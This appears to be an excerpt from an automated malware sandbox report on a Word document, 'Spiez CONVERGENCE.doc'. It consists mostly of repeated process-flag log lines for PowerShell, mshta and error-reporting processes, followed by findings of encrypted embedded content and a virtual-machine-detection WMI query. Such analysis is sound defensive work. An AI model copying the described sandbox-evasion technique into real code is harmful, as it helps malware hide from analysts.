Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX

Document contains OLE streams with high entropy indicating encrypted embedded content

Show sources

Source: Spiez CONVERGENCE.doc

Stream path 'WordDocument' entropy: 7.93695261581 (max. 8.0)

Malware Analysis System Evasion:

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - select * from Win32_ComputerSystem
